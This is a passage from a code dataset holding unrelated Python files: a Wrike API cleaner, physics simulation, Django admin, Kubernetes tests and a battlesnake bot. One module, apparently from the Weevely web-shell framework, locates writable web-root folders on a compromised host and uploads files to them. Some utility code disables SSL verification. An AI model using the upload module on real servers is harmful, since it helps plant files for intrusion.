= \"https://app-eu.wrike.com/api/v3/customfields/\" + cf\r\n response = requests.get(url, headers=headers)\r\n with open('wriketemp.json', 'w+') as outf:\r\n outf.write(response.text)\r\n try:\r\n with open('wriketemp.json') as f:\r\n result = json.load(f)\r\n except:\r\n print(\"unexpected error\")\r\n cfname = result[\"data\"][0][\"title\"]\r\n customfieldsdict[cf] = cfname\r\n i['id'] = cfname\r\n\r\nfor i in data[\"data\"]:\r\n users = i[\"authorIds\"][0]\r\n if users in usernamedict.keys():\r\n i[\"authorIds\"][0] = usernamedict[users]\r\n else:\r\n print(\"UserID not present, calling API\")\r\n url = \"https://app-eu.wrike.com/api/v3/users/\" + users\r\n response = requests.get(url, headers=headers)\r\n with open('wriketemp.json', 'w+') as outf:\r\n outf.write(response.text)\r\n try:\r\n with open('wriketemp.json') as f:\r\n result = json.load(f)\r\n except:\r\n print(\"unexpected error\")\r\n name = result[\"data\"][0][\"firstName\"] + \" \" + result[\"data\"][0][\"lastName\"]\r\n usernamedict[users] = name\r\n i[\"authorIds\"][0] = name\r\n\r\nwith open(filename+\".json\", 'w+') as outfile:\r\n json.dump(data, outfile)\r\n\r\n\r\n\r\n\r\n","sub_path":"CleandataWrike.py","file_name":"CleandataWrike.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"18576364","text":"from core.vectors import PhpCode, ShellCmd, ModuleExec, Os\nfrom core.module import Module\nfrom core import modules\nfrom core import messages\nfrom core.loggers import log\nimport urlparse\nimport os\n\nclass Upload2web(Module):\n\n \"\"\"Upload file automatically to a web folder and get corresponding URL\"\"\"\n\n aliases = [ 'rm' ]\n\n def init(self):\n\n self.register_info(\n {\n 'author': [\n 'Emilio Pinna'\n ],\n 'license': 'GPLv3'\n }\n )\n\n self.register_arguments([\n { 'name' : 'lpath', 'help' : 'Local file path' },\n { 'name' : 'rpath', 'help' : 'Path. If is a folder find the first writable folder in it.', 'default' : '.', 'nargs' : '?' },\n ])\n\n def _get_env_info(self, script_url):\n\n script_folder_data = ModuleExec('system_info', [ '-info', 'script_folder' ]).run()\n if not script_folder_data or not script_folder_data.get('script_folder'): return\n\n script_folder = script_folder_data.get('script_folder')\n script_url_splitted = urlparse.urlsplit(script_url)\n script_url_path_folder, script_url_path_filename = os.path.split(\n script_url_splitted.path)\n\n url_folder_pieces = script_url_path_folder.split(os.sep)\n folder_pieces = script_folder.split(os.sep)\n\n for pieceurl, piecefolder in zip(reversed(url_folder_pieces), reversed(folder_pieces)):\n if pieceurl == piecefolder:\n folder_pieces.pop()\n url_folder_pieces.pop()\n else:\n break\n\n base_url_path_folder = os.sep.join(url_folder_pieces)\n self.base_folder_url = urlparse.urlunsplit(\n script_url_splitted[:2] + (base_url_path_folder, ) + script_url_splitted[3:])\n self.base_folder_path = os.sep.join(folder_pieces)\n\n def _map_folder2web(self, relative_path_folder='.'):\n\n absolute_path = ModuleExec('file_check', [ relative_path_folder, 'abspath' ]).run()\n\n if not absolute_path:\n log.warn(messages.module_file_upload2web.failed_resolve_path)\n return None, None\n\n if not absolute_path.startswith(self.base_folder_path.rstrip('/')):\n log.warn(messages.module_file_upload2web.error_s_not_under_webroot_s % (\n absolute_path,\n self.base_folder_path.rstrip('/'))\n )\n return None, None\n\n relative_to_webroot_path = absolute_path.replace(\n self.base_folder_path,\n ''\n )\n\n url_folder = '%s/%s' % (self.base_folder_url.rstrip('/'),\n relative_to_webroot_path.lstrip('/'))\n\n return absolute_path, url_folder\n\n def _map_file2web(self, relative_path_file):\n\n relative_path_folder, filename = os.path.split(relative_path_file)\n if not relative_path_folder:\n relative_path_folder = './'\n\n absolute_path_folder, url_folder = self._map_folder2web(\n relative_path_folder)\n\n if not absolute_path_folder or not url_folder:\n return None, None\n\n absolute_path_file = os.path.join(absolute_path_folder, filename)\n url_file = os.path.join(url_folder, filename)\n\n return absolute_path_file, url_file\n\n def run(self, args):\n\n self._get_env_info(self.session['url'])\n if not self.base_folder_url or not self.base_folder_path:\n log.warn(messages.module_file_upload2web.failed_retrieve_info)\n\n # If remote path is a folder, get first writable folder\n if ModuleExec(\"file_check\", [ args['rpath'], 'dir' ]).run():\n folders = ModuleExec(\"file_find\", [ '-writable', '-quit', args['rpath'] ]).run()\n\n if not folders or not folders[0]:\n log.warn(messages.module_file_upload2web.failed_search_writable_starting_s % args['rpath'])\n return\n\n # Get file name from lpath\n lfolder, lname = os.path.split(args['lpath'])\n\n # TODO: all the paths should be joined with remote OS_SEP from system_info.\n args['rpath'] = os.path.join(folders[0], lname)\n\n if ModuleExec(\"file_upload\", [ args['lpath'], args['rpath'] ]).run():\n # Guess URL from rpath\n return [ self._map_file2web(args['rpath']) ]\n","sub_path":"modules/file/upload2web.py","file_name":"upload2web.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"484208085","text":"import numpy as np\r\nimport random\r\nimport massParam as P\r\n\r\nclass massDynamics:\r\n def __init__(self, alpha=0.0):\r\n # Initial state conditions\r\n self.state = np.array([\r\n [P.z0], # initial position\r\n [P.zdot0] # initial velocity\r\n ])\r\n\r\n # simulation time step\r\n self.Ts = P.Ts\r\n\r\n # mass of box\r\n self.m = P.m * (1.+alpha*(2.*np.random.rand()-1.))\r\n\r\n # spring coefficient\r\n self.k = P.k * (1.+alpha*(2.*np.random.rand()-1.))\r\n\r\n # Damping coefficient, Ns\r\n self.b = P.b * (1.+alpha*(2.*np.random.rand()-1.))\r\n self.force_limit = P.f_max\r\n\r\n def update(self, u):\r\n # This is the external method that takes the input u at time\r\n # t and returns the output y at time t.\r\n # saturate the input torque\r\n u = self.saturate(u, self.force_limit)\r\n\r\n self.rk4_step(u) # propagate the state by one time sample\r\n y = self.h() # return the corresponding output\r\n\r\n return y\r\n\r\n def f(self, state, u):\r\n # Return xdot = f(x,u)\r\n z = state.item(0)\r\n zdot = state.item(1)\r\n force = u\r\n\r\n M = self.m\r\n\r\n C = -self.k * z + force - self.b * zdot\r\n\r\n\r\n #tmp = np.linalg.inv(M) @ C\r\n zddot = C/M\r\n\r\n # build xdot and return\r\n xdot = np.array([[zdot], [zddot]])\r\n return xdot\r\n\r\n def h(self):\r\n # return y = h(x)\r\n z = self.state.item(0)\r\n y = np.array([[z]])\r\n\r\n return y\r\n\r\n def rk4_step(self, u):\r\n # Integrate ODE using Runge-Kutta RK4 algorithm\r\n F1 = self.f(self.state, u)\r\n F2 = self.f(self.state + self.Ts / 2 * F1, u)\r\n F3 = self.f(self.state + self.Ts / 2 * F2, u)\r\n F4 = self.f(self.state + self.Ts * F3, u)\r\n self.state = self.state + self.Ts / 6 * (F1 + (2 * F2) + (2 * F3) + F4)\r\n\r\n def saturate(self, u, limit):\r\n if abs(u) > limit:\r\n u = limit*np.sign(u)\r\n return u\r\n","sub_path":"homework_template_folders/d_mass/python/hw3/massDynamics.py","file_name":"massDynamics.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"486524256","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.contrib import admin\r\n\r\nfrom ..models import *\r\n\r\n\r\n#\r\n# Admin: Redirect\r\n#\r\n\r\nclass RedirectAdmin(admin.ModelAdmin):\r\n fieldsets = [\r\n ['Podstawowe informacje', {\r\n 'fields': ['name', 'target_url']\r\n }],\r\n ]\r\n ordering = ['name']\r\n list_display = ['name', 'slug', 'target_url']\r\n \r\n class Media:\r\n js = ['panel/js/admin/utils.js', 'panel/js/admin/base.js']\r\n \r\nadmin.site.register(Redirect, RedirectAdmin)\r\n","sub_path":"src/apro/allegro_pots/admin/redirects.py","file_name":"redirects.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"130016410","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import Booking\n\nclass BookingAdmin(admin.ModelAdmin):\n list_display=('id','customerID','packageName','price', 'startDate','endDate')\n list_display_links=('id',)\n search_fields=('id',)\n list_per_page=25\n\nadmin.site.register(Booking,BookingAdmin)","sub_path":"bookings/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"545665747","text":"import unittest\nimport os\nimport pkg_resources\nimport pandas as pd\nimport numpy as np\n\n\n\nDATA_PATH = pkg_resources.resource_filename('cheml', os.path.join('tests', 'data'))\n\nfrom cheml.preprocessing import MissingValues\n\n\n# dummy data\ndf = pd.read_csv(os.path.join(DATA_PATH,'test_missing_values.csv'), header=None)\ntarget=pd.DataFrame([1,2,3,np.nan,4])\n\n\nclass TestConstantColumns(unittest.TestCase):\n def test_zero(self):\n mv = MissingValues(strategy = 'zero',\n string_as_null = True,\n inf_as_null = True,\n missing_values = None)\n f = mv.fit_transform(df)\n t = mv.fit_transform(target)\n self.assertEqual((5,9), f.shape)\n self.assertEqual(0.0, f[10][0])\n self.assertEqual(0.0, f[10][2])\n self.assertEqual(0.0, f[2][1])\n self.assertEqual(0.0, f[1][0])\n\nif __name__== '__main__':\n unittest.main()\n\n","sub_path":"cheml/tests/test_MissingValues.py","file_name":"test_MissingValues.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"173330867","text":"# =================================================================\n#\n# Terms and Conditions of Use\n#\n# Unless otherwise noted, computer program source code of this\n# distribution is covered under Crown Copyright, Government of\n# Canada, and is distributed under the MIT License.\n#\n# The Canada wordmark and related graphics associated with this\n# distribution are protected under trademark law and copyright law.\n# No permission is granted to use them outside the parameters of\n# the Government of Canada's corporate identity program. For\n# more information, see\n# http://www.tbs-sct.gc.ca/fip-pcim/index-eng.asp\n#\n# Copyright title to all 3rd party software distributed with this\n# software is held by the respective copyright holders as noted in\n# those files. Users are asked to read the 3rd Party Licenses\n# referenced with those assets.\n#\n# Copyright (c) 2020 Government of Canada\n# Copyright (c) 2020 IBL Software Engineering spol. s r. o.\n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following\n# conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# =================================================================\n\nimport logging\nimport os\nimport ssl\nimport sys\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\n\nfrom lxml import etree\n\nLOGGER = logging.getLogger(__name__)\n\nNAMESPACES = {\n 'gco': 'http://www.isotc211.org/2005/gco',\n 'gmd': 'http://www.isotc211.org/2005/gmd',\n 'gml': 'http://www.opengis.net/gml/3.2',\n 'gmx': 'http://www.isotc211.org/2005/gmx',\n 'xlink': 'http://www.w3.org/1999/xlink'\n}\n\n\ndef get_cli_common_options(function):\n \"\"\"\n Define common CLI options\n \"\"\"\n\n import click\n function = click.option('--verbosity', '-v',\n type=click.Choice(\n ['ERROR', 'WARNING', 'INFO', 'DEBUG']),\n help='Verbosity')(function)\n function = click.option('--log', '-l', 'logfile',\n type=click.Path(writable=True, dir_okay=False),\n help='Log file')(function)\n return function\n\n\ndef get_codelists():\n \"\"\"\n Helper function to assemble dict of WMO codelists\n\n :returns: `dict` of WMO codelists\n\n \"\"\"\n codelists = {}\n userdir = get_userdir()\n xml = etree.parse('{}{}WMOCodeLists.xml'.format(userdir, os.sep))\n for cld in xml.xpath('gmx:codelistItem/gmx:CodeListDictionary', namespaces=NAMESPACES):\n identifier = cld.get(nspath_eval('gml:id'))\n codelists[identifier] = []\n for centry in cld.findall(nspath_eval('gmx:codeEntry/gmx:CodeDefinition/gml:identifier')):\n codelists[identifier].append(centry.text)\n return codelists\n\n\ndef get_userdir() -> str:\n \"\"\"\n Helper function to get userdir\n\n :returns: user's home directory\n \"\"\"\n\n return '{}{}{}'.format(os.path.expanduser('~'), os.sep, '.pywcmp')\n\n\ndef nspath_eval(xpath: str) -> str:\n \"\"\"\n Return an etree friendly xpath based expanding namespace\n into namespace URIs\n\n :param xpath: xpath string with namespace prefixes\n\n :returns: etree friendly xpath\n \"\"\"\n\n out = []\n for chunks in xpath.split('/'):\n namespace, element = chunks.split(':')\n out.append('{{{}}}{}'.format(NAMESPACES[namespace], element))\n return '/'.join(out)\n\n\ndef setup_logger(loglevel: str = None, logfile: str = None):\n \"\"\"\n Setup logging\n\n :param loglevel: logging level\n :param logfile: logfile location\n\n :returns: void (creates logging instance)\n \"\"\"\n\n if loglevel is None and logfile is None: # no logging\n return\n\n if loglevel is None and logfile is not None:\n loglevel = 'INFO'\n\n log_format = \\\n '[%(asctime)s] %(levelname)s - %(message)s'\n date_format = '%Y-%m-%dT%H:%M:%SZ'\n\n loglevels = {\n 'CRITICAL': logging.CRITICAL,\n 'ERROR': logging.ERROR,\n 'WARNING': logging.WARNING,\n 'INFO': logging.INFO,\n 'DEBUG': logging.DEBUG,\n 'NOTSET': logging.NOTSET,\n }\n\n loglevel = loglevels[loglevel]\n\n if logfile is not None: # log to file\n logging.basicConfig(level=loglevel, datefmt=date_format,\n format=log_format, filename=logfile)\n elif loglevel is not None: # log to stdout\n logging.basicConfig(level=loglevel, datefmt=date_format,\n format=log_format, stream=sys.stdout)\n LOGGER.debug('Logging initialized')\n\n\ndef urlopen_(url: str):\n \"\"\"\n Helper function for downloading a URL\n\n :param url: URL to download\n\n :returns: `http.client.HTTPResponse`\n \"\"\"\n\n try:\n response = urlopen(url)\n except (ssl.SSLError, URLError) as err:\n LOGGER.warning(err)\n LOGGER.warning('Creating unverified context')\n context = ssl._create_unverified_context()\n\n response = urlopen(url, context=context)\n\n return response\n\n\ndef check_url(url: str, check_ssl: bool) -> dict:\n \"\"\"\n Helper function to check link (URL) accessibility\n\n :param url: The URL to check\n :param check_ssl: Whether the SSL/TLS layer verification shall be made\n\n :returns: `dict` with details about the link\n \"\"\"\n\n result = {}\n response = None\n result['url-original'] = url\n try:\n if check_ssl is False:\n LOGGER.debug('Creating unverified context')\n result['ssl'] = False\n context = ssl._create_unverified_context()\n response = urlopen(url, context=context)\n else:\n response = urlopen(url)\n except (ssl.SSLError, URLError) as err:\n LOGGER.debug(err)\n\n if response is None and check_ssl is True:\n return check_url(url, False)\n\n if response is not None:\n result['url-resolved'] = response.url\n if response.status > 300:\n LOGGER.debug('Request failed: {}'.format(response))\n result['accessible'] = response.status < 300\n if response.url.startswith(\"https\") and check_ssl is True:\n result['ssl'] = True\n else:\n result['accessible'] = False\n return result\n\n\ndef validate_iso_xml(xml):\n \"\"\"\n Perform XML Schema validation of ISO XML Metadata\n\n :param xml: file or string of XML\n\n :returns: `bool` of whether XML validates ISO schema\n \"\"\"\n\n userdir = get_userdir()\n if not os.path.exists(userdir):\n raise IOError('{} does not exist'.format(userdir))\n if isinstance(xml, str):\n xml = etree.fromstring(xml)\n xsd = os.path.join(userdir, 'iso-all.xsd')\n LOGGER.debug('Validating {} against schema {}'.format(xml, xsd))\n schema = etree.XMLSchema(etree.parse(xsd))\n schema.assertValid(xml)\n","sub_path":"pywcmp/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"91158530","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n## タイトル\n03. 円周率\n\"Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics.\"\nという文を単語に分解し,各単語の(アルファベットの)文字数を先頭から出現順に並べたリストを作成せよ.\n\n## メモ\n\n\n\"\"\"\n\ninput_str = u'Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics.'\nprint(input_str)\n\noutput_list = input_str.split(\" \")\n\n#print(output_list)\n#print(type(output_list))\n\nfor h in range(len(output_list)):\n print(output_list[h])\n\n","sub_path":"c3.py","file_name":"c3.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"571665417","text":"#\n# Copyright (c) 2021 Incisive Technology Ltd\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nimport pytest\nfrom typing import cast\nfrom unittest import SkipTest\nfrom hikaru import *\nfrom hikaru.model.rel_1_17 import *\nfrom kubernetes import config\n\n\ntests_namespace = 'other-args-tests-17'\n\n\ndef beginning():\n config.load_kube_config(config_file=\"/etc/rancher/k3s/k3s.yaml\")\n ns = Namespace(metadata=ObjectMeta(name=tests_namespace))\n res = ns.createNamespace()\n return res\n\n\ndef ending():\n Namespace.deleteNamespace(name=tests_namespace)\n res: Response = PodList.listPodForAllNamespaces()\n plist: PodList = cast(PodList, res.obj)\n for pod in plist.items:\n if pod.metadata.namespace == tests_namespace:\n try:\n Pod.deleteNamespacedPod(pod.metadata.name, pod.metadata.namespace)\n except:\n pass\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef setup():\n res = beginning()\n yield res.obj\n ending()\n\n\ndef test01():\n \"\"\"\n Check async pod creation\n \"\"\"\n base_pod = Pod(metadata=ObjectMeta(name='pod-test01'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = base_pod.createNamespacedPod(namespace=tests_namespace, async_req=True)\n assert not res.obj\n val = res.get(20)\n assert type(val) is tuple\n assert res.obj\n dres = Pod.deleteNamespacedPod(base_pod.metadata.name,\n tests_namespace, async_req=True)\n assert not dres.obj\n val = dres.get(20)\n assert type(val) is tuple\n assert dres.obj\n\n\ndef test02():\n \"\"\"\n Check doing a dry run on Pod creation\n \"\"\"\n p = Pod(metadata=ObjectMeta(name='pod-test02'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = p.createNamespacedPod(namespace=tests_namespace,\n dry_run='All')\n assert res.obj\n assert isinstance(res.obj, Pod)\n assert res.obj.metadata.name == p.metadata.name\n try:\n rres = Pod.readNamespacedPod(p.metadata.name,\n tests_namespace)\n except:\n pass # we were supposed to get an exception\n else:\n assert False, 'we were able to read a pod that was created with dry_run'\n\n\ndef test03():\n \"\"\"\n Test doing both async and dry run\n \"\"\"\n p = Pod(metadata=ObjectMeta(name='pod-test03'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = p.createNamespacedPod(namespace=tests_namespace,\n async_req=True,\n dry_run='All')\n assert not res.obj\n val = res.get()\n assert type(val) is tuple\n assert res.obj\n assert isinstance(res.obj, Pod)\n try:\n rres = Pod.readNamespacedPod(p.metadata.name,\n tests_namespace)\n except:\n pass\n else:\n assert False, 'we were able to read a dryrun pod'\n\n\ndef test04():\n \"\"\"\n test the other async methods on the returned Response\n \"\"\"\n base_pod = Pod(metadata=ObjectMeta(name='pod-test04'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = base_pod.createNamespacedPod(namespace=tests_namespace, async_req=True)\n assert not res.obj\n res.wait(20)\n try:\n assert res.ready()\n val = res.get()\n assert type(val) is tuple\n assert res.obj\n assert res.successful()\n finally:\n dres = Pod.deleteNamespacedPod(base_pod.metadata.name,\n tests_namespace, async_req=True)\n assert not dres.obj\n val = dres.get(20)\n assert type(val) is tuple\n assert dres.obj\n\n\nif __name__ == \"__main__\":\n beginning()\n the_tests = {k: v for k, v in globals().items()\n if k.startswith('test') and callable(v)}\n for k, v in the_tests.items():\n try:\n v()\n except SkipTest:\n pass\n except Exception as e:\n print(f'{k} failed with {str(e)}, {e.__class__}')\n ending()\n raise\n ending()\n","sub_path":"tests/e2e/other_args_rel_1_17.py","file_name":"other_args_rel_1_17.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"173450280","text":"import bottle\nimport json\nimport math\n\n\nourSnakeHead = [0,0]\nourSnake = []\nsnakeName = \"cscusnake\"\n\ndef getDistance(itemA, itemB=ourSnakeHead):\n\n dx = itemA[0] - itemB[0]\n dy = itemA[1] - itemB[1]\n\n dx = math.fabs(dx)\n dy = math.fabs(dy)\n\n return dx + dy\n\n#sorts min-max\ndef sortListByDist(unsorted):\n return sorted(unsorted, key=getDistance)\n\n\ndef findBestFood(orderedFoodList, orderedSnakeList):\n\n for i in range(0, len(orderedFoodList)):\n item = orderedFoodList[i]\n\n for j in range(0, len(orderedSnakeList)):\n if( getDistance(item, orderedSnakeList[j]) < getDistance(item, ourSnakeHead)):\n #someone is closer - ignore the food\n break\n else: #we are closer, go for this food\n return item #return the item position\n\n # we are not closest to any food, define default behaviour\n\n return orderedFoodList[0]\n\n\ndef check_left(location, board):\n if int(location[0]) > 0:\n if str(board[location[0] - 1][location[1]]['state']) == 'food' or str(board[location[0] - 1][location[1]]['state']) == 'empty':\n return False\n else:\n return True\n else:\n print(\"here\")\n return True\ndef check_right(location, board):\n if int(location[0]) < (len(board) - 1):\n if str(board[location[0] + 1][location[1]]['state']) == 'food' or str(board[location[0] + 1][location[1]]['state'] == 'empty'):\n return False\n else:\n return True\n else:\n print(\"here\")\n return True\n\ndef check_up(location, board):\n if int(location[1]) > 0:\n if str(board[location[0]][location[1] - 1]['state']) == 'food' or str(board[location[0]][location[1] - 1]['state']) == 'empty':\n return False\n else:\n return True\n else:\n print(\"here\")\n return True\ndef check_down(location, board):\n if int(location[1]) < (len(board[0]) - 1):\n if str(board[location[0]][location[1] + 1]['state']) == 'food' or str(board[location[0]][location[1] + 1]['state']) == 'empty':\n return False\n else:\n return True\n else:\n print(\"here\")\n return True\n\n@bottle.get('/')\ndef index():\n return \"\"\"\n <a href=\"https://github.com/sendwithus/battlesnake-python\">\n battlesnake-python\n </a>\n \"\"\"\n\n\n@bottle.post('/start')\ndef start():\n data = bottle.request.json\n\n return json.dumps({\n 'name': snakeName,\n 'color': '#00ff00',\n 'head_url': 'http://cscusnake.herokuapp.com',\n 'taunt': 'battlesnake-python!'\n })\n\n\ndef moveUp():\n return json.dumps({\n 'move': 'up'\n })\ndef moveDown():\n return json.dumps({\n 'move': 'down'\n })\ndef moveLeft():\n return json.dumps({\n 'move': 'left'\n })\ndef moveRight():\n return json.dumps({\n 'move': 'right'\n })\n\ndef checkFood(foodList, enemySnakePos):\n global ourSnakeHead\n\n orderedFoodList = sortListByDist(foodList)\n orderedSnakeList = sortListByDist(enemySnakePos)\n\n #get the best food to go for\n foodPos = findBestFood(orderedFoodList, orderedSnakeList)\n\n #determine which way to go here\n return eachTurnMove(ourSnakeHead[0], ourSnakeHead[1], foodPos[0], foodPos[1], ourSnake[1][0], ourSnake[1][1])\n\n\n@bottle.post('/move')\ndef move():\n data = bottle.request.json\n #print (data)\n food = data[\"food\"]\n snakes = data[\"snakes\"]\n board = data['board']\n\n print (snakes)\n print(\"Up \" + str((check_up(snakes[0]['coords'][0], board))))\n print(\"Down \" + str((check_down(snakes[0]['coords'][0], board))))\n print(\"Left \" + str((check_left(snakes[0]['coords'][0], board))))\n print(\"Right \" + str((check_right(snakes[0]['coords'][0], board))))\n\n global ourSnakeHead\n global ourSnake\n enemySnakeHeads = []\n for i in range(0, len(snakes)):\n if(snakes[i][\"name\"] == snakeName):\n ourSnakeHead = snakes[i][\"coords\"][0] # set our snake head position\n ourSnake = snakes[i][\"coords\"] # save our snake\n else:\n enemySnakeHeads.add(snakes[i][\"coords\"][0]) #add enemy snake\n\n if(True):#if go for food\n return checkFood(food, enemySnakeHeads)\n elif(False): #not going for food\n pass #do nothing, remove later\n #more cases here\n\n #default code - to be removed\n return json.dumps({\n 'move': 'left',\n 'taunt': 'battlesnake-python!'\n })\n\n#Callum doing things don't worry about this\ndef eachTurnMove(curX, curY, nextX, nextY, prevX, prevY):\n\n #goal is to give in the current position\n # (get tht from the head and pass it in here)\n #Step 1. Determine which is a greater change, the x or y\n #Step 2. Move left or right depending on blahh\n\n\n #Check Goal positon for r, l, u, d\n #Check each for current moving direction\n #return the fitting stuffs\n\n dX = abs(curX - nextX)\n dY = abs(curY - nextY)\n\n\n #Goal position is to the right\n if(curX - nextX < 0 ):\n if(curX - prevX < 0 ):\n return moveRight()\n if(curX - prevX > 0 ):\n\n if( dY > 0):\n return moveUp()\n if( dY < 0):\n return moveDown()\n else:\n return moveRight()\n\n\n #Goal pos to the left\n\n if(curX - nextX > 0 ):\n if(curX - prevX > 0 ):\n return moveLeft()\n if(curX - prevX < 0 ):\n\n if( dY > 0):\n return moveUp()\n if( dY < 0):\n return moveDown()\n else:\n return moveLeft()\n\n #Goal pos to up\n\n if(curY - nextY < 0 ):\n if(curY - prevY < 0 ):\n return moveUp()\n if(curY - prevY > 0 ):\n\n if( dX < 0):\n return moveRight()\n if( dX > 0):\n return moveLeft()\n else:\n return moveUp()\n\n #Goal is to move down\n\n if(curY - nextY > 0 ):\n if(curY - prevY > 0 ):\n return moveDown()\n if(curY - prevY < 0 ):\n\n if( dX < 0):\n return moveRight()\n if( dX > 0):\n return moveLeft()\n else:\n return moveDown()\n\n #How to get head and head-1 coords\n\n\n\n\n\n\n@bottle.post('/end')\ndef end():\n data = bottle.request.json\n\n return json.dumps({})\n\n\ndef main():\n move()\n\nif __name__ == \"__main__\":\n move()\n\n# Expose WSGI app\napplication = bottle.default_app()\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"483015069","text":"array = [2,3,4,5,5,3,1,2,4]\n\ndef findOdd(arr):\n visited = dict()\n for e in arr:\n if str(e) in visited.keys():\n del visited[str(e)]\n else:\n visited[str(e)] = e\n \n return list(visited.items())[0][1]\n\nprint(findOdd(array.copy()))\n","sub_path":"Cracking the Coding Interview/01_Hash_Tables_and_Arrays/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"372912430","text":"# --- Define your functions below! ---\n\n# --- Put your main program below! ---\ndef main():\n print(\"Here you'll write the sequence of your project.\")\n\n # If you want input from the user, you can use the following\n # Remember to press ctrl+C to stop the forever loop!\n # Take out the \"while True\" line if you don't want the loop\n while True:\n answer = input(\"You can respond by typing something here. \")\n print(\"You said\", answer)\n\n\n# DON'T TOUCH! Setup code that runs your main() function.\nif __name__ == \"__main__\":\n main()\n","sub_path":"Html, JavaScript, CSS/girlsWhoCodeGE-master/girlsWhoCodeGE-master/skeletonCode.py","file_name":"skeletonCode.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"164975638","text":"\nn=int(input(\"enter the size:\"))\npro = 2\n\ndef gen(n,pro):\n\n\tfor i in range(3,n+1):\n\t\ty=0\n\t\tfor j in range(1,i+1):\n\t\t\tx=i%j\n\t\t\tif x==0:\n\t\t\t\ty=y+1\n\t\tif y==2:\n\t\t\tprint(i)\n\t\t\tpro=pro*i\n\n\tprint(pro)\n\ngen(n,pro);\t\n\n\n\t\n\n\n","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"123011777","text":"#!/usr/bin/python3\n\"\"\" Transfers file from local to remote \"\"\"\nfrom fabric.api import *\nimport datetime\n\n\nenv.use_ssh_config = True\nenv.hosts = ['35.237.82.133', '35.196.231.32']\nenv.user = 'ubuntu'\nenv.key_filename = '~/.ssh/holberton'\ndate = datetime.datetime.now().strftime(\"%Y%m%d%I%M%S\")\n\n\ndef transfer():\n \"\"\" 